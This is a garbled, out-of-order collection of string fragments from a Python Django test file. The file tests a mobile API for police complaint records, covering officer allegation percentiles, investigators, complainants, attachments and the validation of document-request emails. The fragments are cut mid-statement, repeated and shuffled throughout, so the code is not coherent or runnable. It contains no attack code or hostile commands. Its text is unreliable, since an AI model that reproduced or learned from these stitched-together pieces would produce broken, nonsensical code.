'full_name': '<NAME>', 'badge': 'COPA/IPRA', 'percentile_allegation': '9.9000', 'percentile_allegation_civilian': '7.7000', 'percentile_allegation_internal': '8.8000', }, {", "5, 1), complaint_percentile=4.4, trr_percentile=5.5, allegation_count=1, sustained_count=1, ) OfficerAllegationFactory( officer=officer, final_finding='SU', start_date=date(2003, 2, 28),", "1), complaint_percentile=6.6, civilian_allegation_percentile=7.7, internal_allegation_percentile=8.8, 
allegation_count=1, sustained_count=0, ) OfficerAllegationFactory( officer=investigator, final_finding='NS', start_date=date(2003, 2, 28),", "django.urls import reverse from django.contrib.gis.geos import Point from mock import patch from rest_framework.test", "id=1, first_name='Ellis', last_name='Skol', appointed_date=date(2001, 5, 1), complaint_percentile=6.6, civilian_allegation_percentile=7.7, internal_allegation_percentile=8.8, allegation_count=1, sustained_count=0, ) OfficerAllegationFactory(", "[ { 'id': 123, 'full_name': '<NAME>', 'rank': 'Officer', 'final_outcome': 'Separation', 'final_finding': 'Sustained', 'allegation_count':", "id=2, first_name='Jerome', last_name='Finnigan', appointed_date=date(2001, 5, 1), complaint_percentile=6.6, civilian_allegation_percentile=7.7, internal_allegation_percentile=8.8, allegation_count=1, sustained_count=0, ) investigator_3", "'final_finding': 'Sustained', 'allegation_count': 1, 'category': 'Operation/Personnel Violations', 'percentile_allegation': '4.4000', 'percentile_allegation_civilian': '1.1000', 'percentile_allegation_internal': '2.2000',", "'full_name': '<NAME>', 'allegation_count': 1, 'sustained_count': 1, 'percentile_trr': '5.5000', 'percentile_allegation': '4.4000', } ], 'attachments':", "'<NAME>', 'badge': 'CPD', 'percentile_allegation': '6.6000', 'percentile_allegation_civilian': '7.7000', 'percentile_allegation_internal': '8.8000', }, { 'involved_type': 'police_witness',", "'COPA/IPRA', }, { 'involved_type': 'investigator', 'officer_id': 4, 'full_name': '<NAME>', 'badge': 'COPA/IPRA', 'percentile_allegation': '9.9000',", "'Thanks for subscribing', 'crid': '112233' }) expect(mock_send_attachment_request_email).to.be.called_once_with( '<EMAIL>', attachment_type='cr_request', pk='112233', ) def test_request_same_document_twice(self):", "last_name='Skol', appointed_date=date(2001, 5, 1), complaint_percentile=6.6, civilian_allegation_percentile=7.7, internal_allegation_percentile=8.8, allegation_count=1, 
sustained_count=0, ) investigator_2 = OfficerFactory(", "gender='M', race='Black', age='18') VictimFactory(allegation=allegation, gender='M', race='Black', age=53) OfficerAllegationFactory( officer=officer1, allegation=allegation, final_finding='SU', final_outcome='Separation', start_date=date(2003,", "civilian_allegation_percentile=1.1, internal_allegation_percentile=2.2, trr_percentile=3.3, allegation_count=1, sustained_count=1, ) OfficerBadgeNumberFactory(officer=officer1, star='12345', current=True) allegation = AllegationFactory( crid='12345',", "test_request_same_document_twice(self): EmailTemplateFactory(type=CR_ATTACHMENT_REQUEST) allegation = AllegationFactory(crid='112233') self.client.post( reverse('api-v2:cr-mobile-request-document', kwargs={'pk': allegation.crid}), {'email': '<EMAIL>'} ) response2", "'CPD', 'percentile_allegation': '6.6000', 'percentile_allegation_civilian': '7.7000', 'percentile_allegation_internal': '8.8000', }, { 'involved_type': 'investigator', 'officer_id': 1,", ") officer = OfficerFactory( id=3, first_name='Raymond', last_name='Piwinicki', appointed_date=date(2001, 5, 1), complaint_percentile=4.4, trr_percentile=5.5, allegation_count=1,", ") from data.constants import MEDIA_TYPE_DOCUMENT from cr.tests.mixins import CRTestCaseMixin from data.cache_managers import officer_cache_manager,", "point=Point(12, 21), incident_date=datetime(2002, 2, 28, tzinfo=pytz.utc), add1=3510, add2='Michigan Ave', city='Chicago', location='Police Communications System',", "Communications System', 'beat': 'Lincoln Square', 'involvements': [ { 'involved_type': 'investigator', 'officer_id': 1, 'full_name':", "sustained_count=0, ) investigator_3 = OfficerFactory( id=4, first_name='Edward', last_name='May', appointed_date=date(2001, 5, 1), complaint_percentile=9.9, civilian_allegation_percentile=7.7,", "'12345', 'most_common_category': { 'category': 'Operation/Personnel Violations', 'allegation_name': 'Secondary/Special Employment' }, 'coaccused': [ {", 
"OfficerFactory( id=1, first_name='Ellis', last_name='Skol', appointed_date=date(2001, 5, 1), complaint_percentile=6.6, civilian_allegation_percentile=7.7, internal_allegation_percentile=8.8, allegation_count=1, sustained_count=0, )", "'attachments': [ { 'title': 'CR document', 'file_type': 'document', 'url': 'http://cr-document.com/', 'id': '123456', }", "robber import expect import pytz from data.factories import ( OfficerFactory, AllegationFactory, OfficerAllegationFactory, ComplainantFactory,", "'percentile_trr': '3.3000', } ], 'complainants': [ { 'race': 'Black', 'gender': 'Male', 'age': 18", "last_name='Skol', appointed_date=date(2001, 5, 1), complaint_percentile=6.6, civilian_allegation_percentile=7.7, internal_allegation_percentile=8.8, allegation_count=1, sustained_count=0, ) OfficerAllegationFactory( officer=investigator, final_finding='NS',", "Square', 'involvements': [ { 'involved_type': 'investigator', 'officer_id': 1, 'full_name': '<NAME>', 'badge': 'CPD', 'percentile_allegation':", "'5.5000', } ], 'attachments': [ { 'title': 'CR document', 'file_type': 'document', 'url': 'http://cr-document.com/',", "attachment_type='cr_request', pk='112233', ) def test_request_same_document_twice(self): EmailTemplateFactory(type=CR_ATTACHMENT_REQUEST) allegation = AllegationFactory(crid='112233') self.client.post( reverse('api-v2:cr-mobile-request-document', kwargs={'pk': allegation.crid}),", "Michigan Ave, Chicago', 'location': 'Police Communications System', 'beat': 'Lincoln Square', 'involvements': [ {", "rank='Officer', appointed_date=date(2001, 1, 1), birth_year=1993, complaint_percentile=4.4, civilian_allegation_percentile=1.1, internal_allegation_percentile=2.2, trr_percentile=3.3, allegation_count=1, sustained_count=1, ) OfficerBadgeNumberFactory(officer=officer1,", "Employment' ) ) officer = OfficerFactory( id=3, first_name='Raymond', last_name='Piwinicki', appointed_date=date(2001, 5, 1), complaint_percentile=9.9,", "'badge': 'CPD', 
'percentile_allegation': '6.6000', 'percentile_allegation_civilian': '7.7000', 'percentile_allegation_internal': '8.8000', }, { 'involved_type': 'police_witness', 'officer_id':", "test_retrieve_badge(self): area = AreaFactory(name='Lincoln Square') officer1 = OfficerFactory( id=123, first_name='Mr', last_name='Foo', gender='M', race='White',", "crid='12345', point=Point(12, 21), incident_date=datetime(2002, 2, 28, tzinfo=pytz.utc), add1=3510, add2='Michigan Ave', city='Chicago', location='Police Communications", "complaint_percentile=9.9, trr_percentile=5.5, allegation_count=1, sustained_count=1, ) OfficerAllegationFactory( officer=officer, final_finding='SU', start_date=date(2003, 2, 28), allegation__incident_date=datetime(2002, 2,", "2, 28), allegation__incident_date=datetime(2002, 2, 28, tzinfo=pytz.utc), allegation__is_officer_complaint=False ) investigator = InvestigatorFactory(officer=investigator) investigator_2 =", "Violations', allegation_name='Secondary/Special Employment' ) ) officer = OfficerFactory( id=3, first_name='Raymond', last_name='Piwinicki', appointed_date=date(2001, 5,", "start_date=date(2003, 2, 28), allegation__incident_date=datetime(2002, 2, 28, tzinfo=pytz.utc), allegation__is_officer_complaint=False ) investigator = InvestigatorFactory(officer=investigator) investigator_2", "= OfficerFactory( id=1, first_name='Ellis', last_name='Skol', appointed_date=date(2001, 5, 1), complaint_percentile=6.6, civilian_allegation_percentile=7.7, internal_allegation_percentile=8.8, allegation_count=1, sustained_count=0,", "internal_allegation_percentile=8.8, allegation_count=1, sustained_count=0, ) OfficerBadgeNumberFactory(officer=investigator_2, star='456789', current=True) OfficerAllegationFactory( officer=investigator, final_finding='NS', start_date=date(2003, 2, 28),", "import ( OfficerFactory, AllegationFactory, OfficerAllegationFactory, ComplainantFactory, AreaFactory, PoliceWitnessFactory, InvestigatorFactory, InvestigatorAllegationFactory, 
AllegationCategoryFactory, AttachmentFileFactory, OfficerBadgeNumberFactory,", "}) def test_retrieve_not_found(self): response = self.client.get(reverse('api-v2:cr-mobile-detail', kwargs={'pk': '45678'})) expect(response.status_code).to.eq(status.HTTP_404_NOT_FOUND) @patch('cr.views.send_attachment_request_email') def test_request_document(self, mock_send_attachment_request_email):", "current_star='123456' ) InvestigatorAllegationFactory( allegation=allegation, investigator=investigator_2, current_star=None ) InvestigatorAllegationFactory( allegation=allegation, investigator=investigator_3, current_star=None ) InvestigatorAllegationFactory(", "'percentile_allegation': '4.4000', 'percentile_allegation_civilian': '1.1000', 'percentile_allegation_internal': '2.2000', 'percentile_trr': '3.3000', } ], 'complainants': [ {", "], 'point': { 'lon': 12.0, 'lat': 21.0 }, 'summary': 'Summary', 'incident_date': '2002-02-28', 'start_date':", "first_name='Mr', last_name='Foo', gender='M', race='White', rank='Officer', appointed_date=date(2001, 1, 1), birth_year=1993, complaint_percentile=4.4, civilian_allegation_percentile=1.1, internal_allegation_percentile=2.2, trr_percentile=3.3,", "'Police Communications System', 'beat': 'Lincoln Square', 'involvements': [ { 'involved_type': 'investigator', 'full_name': '<NAME>',", "'message': 'Please enter a valid email' }) def test_request_document_with_invalid_email(self): AllegationFactory(crid='321') response = self.client.post(reverse('api-v2:cr-mobile-request-document',", "id='654321', url='http://AR-document.com/', file_type=MEDIA_TYPE_DOCUMENT ) officer_cache_manager.build_cached_columns() allegation_cache_manager.cache_data() response = self.client.get(reverse('api-v2:cr-mobile-detail', kwargs={'pk': '12345'})) expect(response.status_code).to.eq(status.HTTP_200_OK) expect(dict(response.data)).to.eq({", "'sustained_count': 1, 'percentile_allegation': '9.9000', 'percentile_trr': '5.5000', } ], 'attachments': [ { 'title': 'CR", "def 
test_request_same_document_twice(self): EmailTemplateFactory(type=CR_ATTACHMENT_REQUEST) allegation = AllegationFactory(crid='112233') self.client.post( reverse('api-v2:cr-mobile-request-document', kwargs={'pk': allegation.crid}), {'email': '<EMAIL>'} )", "mock import patch from rest_framework.test import APITestCase from rest_framework import status from robber", "'end_date': '2006-05-26', 'address': '3510 Michigan Ave, Chicago', 'location': 'Police Communications System', 'beat': 'Lincoln", "'file_type': 'document', 'url': 'http://cr-document.com/', 'id': '123456', } ] }) def test_retrieve_badge(self): area =", "1, 'percentile_allegation': '9.9000', 'percentile_trr': '5.5000', } ], 'attachments': [ { 'title': 'CR document',", "'1.1000', 'percentile_allegation_internal': '2.2000', 'percentile_trr': '3.3000', } ], 'complainants': [ { 'race': 'Black', 'gender':", "26) ) ComplainantFactory(allegation=allegation, gender='M', race='Black', age='18') VictimFactory(allegation=allegation, gender='M', race='Black', age=53) OfficerAllegationFactory( officer=officer1, allegation=allegation,", "}, 'coaccused': [ { 'id': 123, 'full_name': '<NAME>', 'rank': 'Officer', 'final_outcome': 'Separation', 'final_finding':", "'crid': '112233' }) def test_request_document_without_email(self): AllegationFactory(crid='321') response = self.client.post(reverse('api-v2:cr-mobile-request-document', kwargs={'pk': 321})) expect(response.status_code).to.eq(status.HTTP_400_BAD_REQUEST) expect(response.data).to.eq({", "'involved_type': 'investigator', 'officer_id': 4, 'full_name': '<NAME>', 'badge': 'COPA/IPRA', 'percentile_allegation': '9.9000', 'percentile_allegation_civilian': '7.7000', 'percentile_allegation_internal':", "star='456789', current=True) OfficerAllegationFactory( officer=investigator, final_finding='NS', start_date=date(2003, 2, 28), allegation__incident_date=datetime(2002, 2, 28, tzinfo=pytz.utc), allegation__is_officer_complaint=False", "pk='112233', ) def 
test_request_same_document_twice(self): EmailTemplateFactory(type=CR_ATTACHMENT_REQUEST) allegation = AllegationFactory(crid='112233') self.client.post( reverse('api-v2:cr-mobile-request-document', kwargs={'pk': allegation.crid}), {'email':", "3, 20), first_end_date=date(2006, 5, 26) ) ComplainantFactory(allegation=allegation, gender='M', race='Black', age='18') VictimFactory(allegation=allegation, gender='M', race='Black',", "2, 28, tzinfo=pytz.utc), allegation__is_officer_complaint=False ) investigator = InvestigatorFactory(officer=investigator) investigator_2 = InvestigatorFactory(officer=investigator_2) investigator_3 =", "'police_witness', 'officer_id': 3, 'full_name': '<NAME>', 'allegation_count': 1, 'sustained_count': 1, 'percentile_trr': '5.5000', 'percentile_allegation': '4.4000',", "} ] }) def test_retrieve_not_found(self): response = self.client.get(reverse('api-v2:cr-mobile-detail', kwargs={'pk': '45678'})) expect(response.status_code).to.eq(status.HTTP_404_NOT_FOUND) @patch('cr.views.send_attachment_request_email') def", "OfficerAllegationFactory, ComplainantFactory, AreaFactory, PoliceWitnessFactory, InvestigatorFactory, InvestigatorAllegationFactory, AllegationCategoryFactory, AttachmentFileFactory, OfficerBadgeNumberFactory, VictimFactory ) from data.constants", "complaint_percentile=6.6, civilian_allegation_percentile=7.7, internal_allegation_percentile=8.8, allegation_count=1, sustained_count=0, ) investigator_3 = OfficerFactory( id=4, first_name='Edward', last_name='May', appointed_date=date(2001,", "APITestCase from rest_framework import status from robber import expect import pytz from data.factories", "a valid email' }) def test_request_document_with_invalid_email(self): AllegationFactory(crid='321') response = self.client.post(reverse('api-v2:cr-mobile-request-document', kwargs={'pk': 321}), {'email':", "import MEDIA_TYPE_DOCUMENT from cr.tests.mixins import CRTestCaseMixin from data.cache_managers import officer_cache_manager, 
allegation_cache_manager from email_service.constants", "'officer_id': 1, 'full_name': '<NAME>', 'badge': 'CPD', 'percentile_allegation': '6.6000', 'percentile_allegation_civilian': '7.7000', 'percentile_allegation_internal': '8.8000', },", "first_name='Ellis', last_name='Skol', appointed_date=date(2001, 5, 1), complaint_percentile=6.6, civilian_allegation_percentile=7.7, internal_allegation_percentile=8.8, allegation_count=1, sustained_count=0, ) investigator_2 =", "1, 'sustained_count': 1, 'percentile_trr': '5.5000', 'percentile_allegation': '4.4000', } ], 'attachments': [ { 'title':", "'sustained_count': 1, 'percentile_trr': '5.5000', 'percentile_allegation': '4.4000', } ], 'attachments': [ { 'title': 'CR", "from rest_framework import status from robber import expect import pytz from data.factories import", "'7.7000', 'percentile_allegation_internal': '8.8000', }, { 'involved_type': 'police_witness', 'officer_id': 3, 'full_name': '<NAME>', 'allegation_count': 1,", "[ { 'title': 'CR document', 'file_type': 'document', 'url': 'http://cr-document.com/', 'id': '123456', } ]", "'coaccused': [ { 'id': 123, 'full_name': '<NAME>', 'rank': 'Officer', 'final_outcome': 'Separation', 'final_finding': 'Sustained',", "sustained_count=1, ) OfficerAllegationFactory( officer=officer, final_finding='SU', start_date=date(2003, 2, 28), allegation__incident_date=datetime(2002, 2, 28, tzinfo=pytz.utc), allegation__is_officer_complaint=False", "'investigator', 'full_name': '<NAME>', 'badge': 'COPA/IPRA', }, { 'involved_type': 'investigator', 'officer_id': 4, 'full_name': '<NAME>',", "OfficerAllegationFactory( officer=officer1, allegation=allegation, final_finding='SU', disciplined=True, final_outcome='Separation', start_date=date(2003, 3, 20), end_date=date(2006, 5, 26), allegation_category=AllegationCategoryFactory(", "tag='TRR', allegation=allegation, title='CR arrest report document', url='http://cr-document.com/', file_type=MEDIA_TYPE_DOCUMENT ) AttachmentFileFactory( tag='AR', 
allegation=allegation, title='CR", "crid='12345', point=Point(12, 21), incident_date=datetime(2007, 2, 28, tzinfo=pytz.utc), add1=3510, add2='Michigan Ave', city='Chicago', location='Police Communications", "allegation_count=1, sustained_count=1, ) OfficerBadgeNumberFactory(officer=officer1, star='12345', current=True) allegation = AllegationFactory( crid='12345', point=Point(12, 21), incident_date=datetime(2007,", "= InvestigatorFactory(first_name='Kevin', last_name='Osborn') InvestigatorAllegationFactory( allegation=allegation, investigator=investigator, current_star='123456' ) InvestigatorAllegationFactory( allegation=allegation, investigator=investigator_2, current_star=None )", "AttachmentFileFactory, OfficerBadgeNumberFactory, VictimFactory ) from data.constants import MEDIA_TYPE_DOCUMENT from cr.tests.mixins import CRTestCaseMixin from", "investigator=investigator_3, current_star=None ) InvestigatorAllegationFactory( allegation=allegation, investigator=investigator_4, current_star=None ) AttachmentFileFactory( tag='TRR', allegation=allegation, title='CR document',", "OfficerBadgeNumberFactory(officer=officer1, star='12345', current=True) allegation = AllegationFactory( crid='12345', point=Point(12, 21), incident_date=datetime(2007, 2, 28, tzinfo=pytz.utc),", "= OfficerFactory( id=123, first_name='Mr', last_name='Foo', gender='M', race='White', rank='Officer', appointed_date=date(2001, 1, 1), birth_year=1993, complaint_percentile=4.4,", ") expect(response.status_code).to.eq(status.HTTP_200_OK) expect(response.data).to.eq({ 'message': 'Thanks for subscribing', 'crid': '112233' }) expect(mock_send_attachment_request_email).to.be.called_once_with( '<EMAIL>', attachment_type='cr_request',", "expect(mock_send_attachment_request_email).to.be.called_once_with( '<EMAIL>', attachment_type='cr_request', pk='112233', ) def test_request_same_document_twice(self): EmailTemplateFactory(type=CR_ATTACHMENT_REQUEST) allegation = AllegationFactory(crid='112233') 
self.client.post( reverse('api-v2:cr-mobile-request-document',", "InvestigatorFactory(officer=investigator) InvestigatorAllegationFactory( allegation=allegation, investigator=investigator, ) AttachmentFileFactory( tag='TRR', allegation=allegation, title='CR document', id='123456', url='http://cr-document.com/', file_type=MEDIA_TYPE_DOCUMENT", "'2006-05-26', 'address': '3510 Michigan Ave, Chicago', 'location': 'Police Communications System', 'beat': 'Lincoln Square',", "current=True) allegation = AllegationFactory( crid='12345', point=Point(12, 21), incident_date=datetime(2002, 2, 28, tzinfo=pytz.utc), add1=3510, add2='Michigan", "'percentile_allegation_civilian': '1.1000', 'percentile_allegation_internal': '2.2000', 'percentile_trr': '3.3000', } ], 'complainants': [ { 'race': 'Black',", "AreaFactory, PoliceWitnessFactory, InvestigatorFactory, InvestigatorAllegationFactory, AllegationCategoryFactory, AttachmentFileFactory, OfficerBadgeNumberFactory, VictimFactory ) from data.constants import MEDIA_TYPE_DOCUMENT", "allegation=allegation, final_finding='SU', final_outcome='Separation', start_date=date(2003, 3, 20), end_date=date(2006, 5, 26), allegation_category=AllegationCategoryFactory( category='Operation/Personnel Violations', allegation_name='Secondary/Special", "2, 28, tzinfo=pytz.utc), allegation__is_officer_complaint=False ) PoliceWitnessFactory(officer=officer, allegation=allegation) investigator = OfficerFactory( id=1, first_name='Ellis', last_name='Skol',", "'Secondary/Special Employment' }, 'coaccused': [ { 'id': 123, 'full_name': '<NAME>', 'rank': 'Officer', 'final_outcome':", "OfficerBadgeNumberFactory(officer=officer1, star='12345', current=True) allegation = AllegationFactory( crid='12345', point=Point(12, 21), incident_date=datetime(2002, 2, 28, tzinfo=pytz.utc),", "complaint_percentile=4.4, civilian_allegation_percentile=1.1, internal_allegation_percentile=2.2, trr_percentile=3.3, allegation_count=1, sustained_count=1, ) 
OfficerBadgeNumberFactory(officer=officer1, star='12345', current=True) allegation = AllegationFactory(", "officer=officer1, allegation=allegation, final_finding='SU', final_outcome='Separation', start_date=date(2003, 3, 20), end_date=date(2006, 5, 26), allegation_category=AllegationCategoryFactory( category='Operation/Personnel Violations',", "}, { 'involved_type': 'investigator', 'officer_id': 1, 'full_name': '<NAME>', 'badge': 'CPD', 'percentile_allegation': '6.6000', 'percentile_allegation_civilian':", "self.client.post( reverse('api-v2:cr-mobile-request-document', kwargs={'pk': allegation.crid}), {'email': '<EMAIL>'} ) expect(response2.status_code).to.eq(status.HTTP_400_BAD_REQUEST) expect(response2.data).to.eq({ 'message': 'Email already added',", "investigator=investigator, ) AttachmentFileFactory( tag='TRR', allegation=allegation, title='CR document', id='123456', url='http://cr-document.com/', file_type=MEDIA_TYPE_DOCUMENT ) AttachmentFileFactory( tag='TRR',", "valid email' }) def test_request_document_with_invalid_email(self): AllegationFactory(crid='321') response = self.client.post(reverse('api-v2:cr-mobile-request-document', kwargs={'pk': 321}), {'email': 'invalid@email'})", "internal_allegation_percentile=8.8, allegation_count=1, sustained_count=0, ) investigator_2 = OfficerFactory( id=2, first_name='Jerome', last_name='Finnigan', appointed_date=date(2001, 5, 1),", "current_star=None ) InvestigatorAllegationFactory( allegation=allegation, investigator=investigator_3, current_star=None ) InvestigatorAllegationFactory( allegation=allegation, investigator=investigator_4, current_star=None ) AttachmentFileFactory(", "'Please enter a valid email' }) def test_request_document_with_invalid_allegation(self): response = self.client.post(reverse('api-v2:cr-mobile-request-document', kwargs={'pk': 321}))", "[ { 'race': 'Black', 'gender': 'Male', 'age': 18 } ], 'victims': [ {", "import status from robber import expect import pytz from data.factories import ( 
OfficerFactory,", "28, tzinfo=pytz.utc), allegation__is_officer_complaint=False ) investigator = InvestigatorFactory(officer=investigator) investigator_2 = InvestigatorFactory(officer=investigator_2) investigator_3 = InvestigatorFactory(officer=investigator_3)", "email' }) def test_request_document_with_invalid_email(self): AllegationFactory(crid='321') response = self.client.post(reverse('api-v2:cr-mobile-request-document', kwargs={'pk': 321}), {'email': 'invalid@email'}) expect(response.status_code).to.eq(status.HTTP_400_BAD_REQUEST)", "AllegationFactory( crid='12345', point=Point(12, 21), incident_date=datetime(2002, 2, 28, tzinfo=pytz.utc), add1=3510, add2='Michigan Ave', city='Chicago', location='Police", "], 'attachments': [ { 'title': 'CR document', 'file_type': 'document', 'url': 'http://cr-document.com/', 'id': '123456',", "incident_date=datetime(2002, 2, 28, tzinfo=pytz.utc), add1=3510, add2='Michigan Ave', city='Chicago', location='Police Communications System', beat=area, is_officer_complaint=False,", "1), complaint_percentile=6.6, civilian_allegation_percentile=7.7, internal_allegation_percentile=8.8, allegation_count=1, sustained_count=0, ) investigator_2 = OfficerFactory( id=2, first_name='Jerome', last_name='Finnigan',", "Point from mock import patch from rest_framework.test import APITestCase from rest_framework import status", "email_service.factories import EmailTemplateFactory class CRMobileViewSetTestCase(CRTestCaseMixin, APITestCase): def test_retrieve(self): area = AreaFactory(name='Lincoln Square') officer1", "reverse('api-v2:cr-mobile-request-document', kwargs={'pk': allegation.crid}), {'email': '<EMAIL>'} ) response2 = self.client.post( reverse('api-v2:cr-mobile-request-document', kwargs={'pk': allegation.crid}), {'email':", "expect(response2.data).to.eq({ 'message': 'Email already added', 'crid': '112233' }) def test_request_document_without_email(self): AllegationFactory(crid='321') response =", "( OfficerFactory, AllegationFactory, 
OfficerAllegationFactory, ComplainantFactory, AreaFactory, PoliceWitnessFactory, InvestigatorFactory, InvestigatorAllegationFactory, AllegationCategoryFactory, AttachmentFileFactory, OfficerBadgeNumberFactory, VictimFactory", "{ 'race': 'Black', 'gender': 'Male', 'age': 18 } ], 'victims': [ { 'race':", "investigator = InvestigatorFactory(officer=investigator) InvestigatorAllegationFactory( allegation=allegation, investigator=investigator, ) AttachmentFileFactory( tag='TRR', allegation=allegation, title='CR document', id='123456',", "investigator_4 = InvestigatorFactory(first_name='Kevin', last_name='Osborn') InvestigatorAllegationFactory( allegation=allegation, investigator=investigator, current_star='123456' ) InvestigatorAllegationFactory( allegation=allegation, investigator=investigator_2, current_star=None", "InvestigatorAllegationFactory( allegation=allegation, investigator=investigator_3, current_star=None ) InvestigatorAllegationFactory( allegation=allegation, investigator=investigator_4, current_star=None ) AttachmentFileFactory( tag='TRR', allegation=allegation,", "sustained_count=0, ) OfficerAllegationFactory( officer=investigator, final_finding='NS', start_date=date(2003, 2, 28), allegation__incident_date=datetime(2002, 2, 28, tzinfo=pytz.utc), allegation__is_officer_complaint=False", "'percentile_allegation_internal': '8.8000', }, { 'involved_type': 'investigator', 'officer_id': 1, 'full_name': '<NAME>', 'badge': 'CPD', 'percentile_allegation':", "Employment' ) ) officer = OfficerFactory( id=3, first_name='Raymond', last_name='Piwinicki', appointed_date=date(2001, 5, 1), complaint_percentile=4.4,", "{'email': '<EMAIL>'} ) expect(response2.status_code).to.eq(status.HTTP_400_BAD_REQUEST) expect(response2.data).to.eq({ 'message': 'Email already added', 'crid': '112233' }) def", "'message': 'Email already added', 'crid': '112233' }) def test_request_document_without_email(self): AllegationFactory(crid='321') response = 
self.client.post(reverse('api-v2:cr-mobile-request-document',", "def test_request_document_without_email(self): AllegationFactory(crid='321') response = self.client.post(reverse('api-v2:cr-mobile-request-document', kwargs={'pk': 321})) expect(response.status_code).to.eq(status.HTTP_400_BAD_REQUEST) expect(response.data).to.eq({ 'message': 'Please enter", "patch from rest_framework.test import APITestCase from rest_framework import status from robber import expect", "'officer_id': 3, 'full_name': '<NAME>', 'allegation_count': 1, 'sustained_count': 1, 'percentile_allegation': '9.9000', 'percentile_trr': '5.5000', }", "from django.urls import reverse from django.contrib.gis.geos import Point from mock import patch from", "first_end_date=date(2006, 5, 26) ) ComplainantFactory(allegation=allegation, gender='M', race='Black', age='18') VictimFactory(allegation=allegation, gender='M', race='Black', age=53) OfficerAllegationFactory(", "investigator = OfficerFactory( id=1, first_name='Ellis', last_name='Skol', appointed_date=date(2001, 5, 1), complaint_percentile=6.6, civilian_allegation_percentile=7.7, internal_allegation_percentile=8.8, allegation_count=1,", "321}), {'email': 'invalid@email'}) expect(response.status_code).to.eq(status.HTTP_400_BAD_REQUEST) expect(response.data).to.eq({ 'message': 'Please enter a valid email' }) def", "appointed_date=date(2001, 5, 1), complaint_percentile=6.6, civilian_allegation_percentile=7.7, internal_allegation_percentile=8.8, allegation_count=1, sustained_count=0, ) investigator_3 = OfficerFactory( id=4,", "allegation = AllegationFactory( crid='12345', point=Point(12, 21), incident_date=datetime(2002, 2, 28, tzinfo=pytz.utc), add1=3510, add2='Michigan Ave',", "ComplainantFactory, AreaFactory, PoliceWitnessFactory, InvestigatorFactory, InvestigatorAllegationFactory, AllegationCategoryFactory, AttachmentFileFactory, OfficerBadgeNumberFactory, VictimFactory ) from data.constants import", "from datetime import datetime, date from 
django.urls import reverse from django.contrib.gis.geos import Point", "'age': 53 } ], 'point': { 'lon': 12.0, 'lat': 21.0 }, 'summary': 'Summary',", "race='Black', age='18') VictimFactory(allegation=allegation, gender='M', race='Black', age=53) OfficerAllegationFactory( officer=officer1, allegation=allegation, final_finding='SU', disciplined=True, final_outcome='Separation', start_date=date(2003,", "report document', url='http://cr-document.com/', file_type=MEDIA_TYPE_DOCUMENT ) AttachmentFileFactory( tag='AR', allegation=allegation, title='CR document 2', id='654321', url='http://AR-document.com/',", "'Please enter a valid email' }) def test_request_document_with_invalid_email(self): AllegationFactory(crid='321') response = self.client.post(reverse('api-v2:cr-mobile-request-document', kwargs={'pk':", "'COPA/IPRA', 'percentile_allegation': '9.9000', 'percentile_allegation_civilian': '7.7000', 'percentile_allegation_internal': '8.8000', }, { 'involved_type': 'investigator', 'officer_id': 2,", "sustained_count=1, ) OfficerBadgeNumberFactory(officer=officer1, star='12345', current=True) allegation = AllegationFactory( crid='12345', point=Point(12, 21), incident_date=datetime(2002, 2,", ") InvestigatorAllegationFactory( allegation=allegation, investigator=investigator_4, current_star=None ) AttachmentFileFactory( tag='TRR', allegation=allegation, title='CR document', id='123456', url='http://cr-document.com/',", "import CRTestCaseMixin from data.cache_managers import officer_cache_manager, allegation_cache_manager from email_service.constants import CR_ATTACHMENT_REQUEST from email_service.factories", "star='12345', current=True) allegation = AllegationFactory( crid='12345', point=Point(12, 21), incident_date=datetime(2002, 2, 28, tzinfo=pytz.utc), add1=3510,", "'CR document', 'file_type': 'document', 'url': 'http://cr-document.com/', 'id': '123456', } ] }) def test_retrieve_badge(self):", "appointed_date=date(2001, 5, 1), complaint_percentile=9.9, trr_percentile=5.5, 
allegation_count=1, sustained_count=1, ) OfficerAllegationFactory( officer=officer, final_finding='SU', start_date=date(2003, 2,", "AllegationFactory(crid='321') response = self.client.post(reverse('api-v2:cr-mobile-request-document', kwargs={'pk': 321})) expect(response.status_code).to.eq(status.HTTP_400_BAD_REQUEST) expect(response.data).to.eq({ 'message': 'Please enter a valid", "InvestigatorFactory, InvestigatorAllegationFactory, AllegationCategoryFactory, AttachmentFileFactory, OfficerBadgeNumberFactory, VictimFactory ) from data.constants import MEDIA_TYPE_DOCUMENT from cr.tests.mixins", "gender='M', race='Black', age=53) OfficerAllegationFactory( officer=officer1, allegation=allegation, final_finding='SU', disciplined=True, final_outcome='Separation', start_date=date(2003, 3, 20), end_date=date(2006,", "age='18') VictimFactory(allegation=allegation, gender='M', race='Black', age=53) OfficerAllegationFactory( officer=officer1, allegation=allegation, final_finding='SU', final_outcome='Separation', start_date=date(2003, 3, 20),", "Violations', 'allegation_name': 'Secondary/Special Employment' }, 'coaccused': [ { 'id': 123, 'full_name': '<NAME>', 'rank':", "'full_name': '<NAME>', 'allegation_count': 1, 'sustained_count': 1, 'percentile_allegation': '9.9000', 'percentile_trr': '5.5000', } ], 'attachments':", "20), first_end_date=date(2006, 5, 26) ) ComplainantFactory(allegation=allegation, gender='M', race='Black', age='18') VictimFactory(allegation=allegation, gender='M', race='Black', age=53)", "EmailTemplateFactory(type=CR_ATTACHMENT_REQUEST) allegation = AllegationFactory(crid='112233') self.client.post( reverse('api-v2:cr-mobile-request-document', kwargs={'pk': allegation.crid}), {'email': '<EMAIL>'} ) response2 =", "'involved_type': 'investigator', 'officer_id': 1, 'full_name': '<NAME>', 'badge': 'CPD', 'percentile_allegation': '6.6000', 'percentile_allegation_civilian': '7.7000', 'percentile_allegation_internal':", "expect(response.data).to.eq({ 'message': 
'Please enter a valid email' }) def test_request_document_with_invalid_allegation(self): response = self.client.post(reverse('api-v2:cr-mobile-request-document',", "tag='TRR', allegation=allegation, title='CR document', id='123456', url='http://cr-document.com/', file_type=MEDIA_TYPE_DOCUMENT ) AttachmentFileFactory( tag='AR', allegation=allegation, title='CR document", "28), allegation__incident_date=datetime(2002, 2, 28, tzinfo=pytz.utc), allegation__is_officer_complaint=False ) investigator = InvestigatorFactory(officer=investigator) investigator_2 = InvestigatorFactory(officer=investigator_2)", "'involvements': [ { 'involved_type': 'investigator', 'full_name': '<NAME>', 'badge': 'COPA/IPRA', }, { 'involved_type': 'investigator',", "summary='Summary', first_start_date=date(2003, 3, 20), first_end_date=date(2006, 5, 26) ) ComplainantFactory(allegation=allegation, gender='M', race='Black', age='18') VictimFactory(allegation=allegation,", "1), complaint_percentile=9.9, civilian_allegation_percentile=7.7, internal_allegation_percentile=8.8, allegation_count=1, sustained_count=0, ) OfficerBadgeNumberFactory(officer=investigator_2, star='456789', current=True) OfficerAllegationFactory( officer=investigator, 